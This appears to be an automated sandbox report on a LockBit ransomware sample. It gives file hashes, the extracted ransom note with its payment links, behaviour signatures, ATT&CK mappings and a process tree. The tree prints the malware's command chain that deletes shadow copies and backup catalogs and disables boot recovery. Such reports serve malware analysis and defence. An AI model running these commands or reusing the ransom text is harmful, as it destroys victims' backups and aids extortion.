Analysis

  • max time kernel
    169s
  • max time network
    50s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    15-04-2022 06:49

General

  • Target

    97dc0777cadf1db157c5bb345a82a0757da92eb21d6a7402e11ea3e2d6209605.exe

  • Size

    152KB

  • MD5

    d6404f089ef2bfb45a8a890fdb30b980

  • SHA1

    e7a5369e72ecc7b013b124a8c2ada9918a3ef930

  • SHA256

    97dc0777cadf1db157c5bb345a82a0757da92eb21d6a7402e11ea3e2d6209605

  • SHA512

    36a3ef42420beaacac79d7d2863ec7f67f83be7ad8c9863fede4d84ad79d093a1d103ad8989bb60fb9f7db09a7558429d141768fcdca49b91789be43dcbe0426

Malware Config

Extracted

Path

C:\Program Files\7-Zip\Lang\Restore-My-Files.txt

Family

lockbit

Ransom Note
All your important files are encrypted! Any attempts to restore your files with the thrid-party software will be fatal for your files! RESTORE YOU DATA POSIBLE ONLY BUYING private key from us. There is only one way to get your files back: 1) Through a standard browser(FireFox, Chrome, Edge, Opera) | 1. Open link http://lockbit-decryptor.top/?9B7FDA8D33FEC3F9CD9E338A11EDDD73 | 2. Follow the instructions on this page 2) Through a Tor Browser - recommended | 1. Download Tor browser - https://www.torproject.org/ and install it. | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?9B7FDA8D33FEC3F9CD9E338A11EDDD73 This link only works in Tor Browser! | 3. Follow the instructions on this page ### Attention! ### # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site # Do not rename encrypted files. # Do not try to decrypt using third party software, it may cause permanent data loss. # Decryption of your files with the help of third parties may cause increased price(they add their fee to our). # Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org or use Tor Browser over VPN. # Tor Browser user manual https://tb-manual.torproject.org/about
URLs

http://lockbit-decryptor.top/?9B7FDA8D33FEC3F9CD9E338A11EDDD73

http://lockbitks2tvnmwk.onion/?9B7FDA8D33FEC3F9CD9E338A11EDDD73

Signatures

  • Lockbit

    Ransomware family with multiple variants released since late 2019.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\97dc0777cadf1db157c5bb345a82a0757da92eb21d6a7402e11ea3e2d6209605.exe
    "C:\Users\Admin\AppData\Local\Temp\97dc0777cadf1db157c5bb345a82a0757da92eb21d6a7402e11ea3e2d6209605.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1172
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1744
      • C:\Windows\system32\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:1476
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1728
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:1952
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled no
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:972
      • C:\Windows\system32\wbadmin.exe
        wbadmin delete catalog -quiet
        3⤵
        • Deletes backup catalog
        PID:1504
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1132
  • C:\Windows\system32\wbengine.exe
    "C:\Windows\system32\wbengine.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:604
  • C:\Windows\System32\vdsldr.exe
    C:\Windows\System32\vdsldr.exe -Embedding
    1⤵
      PID:468
    • C:\Windows\System32\vds.exe
      C:\Windows\System32\vds.exe
      1⤵
        PID:1784

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Command-Line Interface

      1
      T1059

      Persistence

      Registry Run Keys / Startup Folder

      1
      T1060

      Defense Evasion

      File Deletion

      3
      T1107

      Modify Registry

      1
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Impact

      Inhibit System Recovery

      4
      T1490

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/972-63-0x0000000000000000-mapping.dmp
      • memory/1172-54-0x00000000002CB000-0x00000000002E2000-memory.dmp
        Filesize

        92KB

      • memory/1172-55-0x00000000755A1000-0x00000000755A3000-memory.dmp
        Filesize

        8KB

      • memory/1172-58-0x00000000002CB000-0x00000000002E2000-memory.dmp
        Filesize

        92KB

      • memory/1172-59-0x00000000001B0000-0x00000000001D6000-memory.dmp
        Filesize

        152KB

      • memory/1172-60-0x0000000000400000-0x0000000002FB1000-memory.dmp
        Filesize

        43.7MB

      • memory/1476-57-0x0000000000000000-mapping.dmp
      • memory/1504-64-0x0000000000000000-mapping.dmp
      • memory/1504-65-0x000007FEFB8B1000-0x000007FEFB8B3000-memory.dmp
        Filesize

        8KB

      • memory/1728-61-0x0000000000000000-mapping.dmp
      • memory/1744-56-0x0000000000000000-mapping.dmp
      • memory/1952-62-0x0000000000000000-mapping.dmp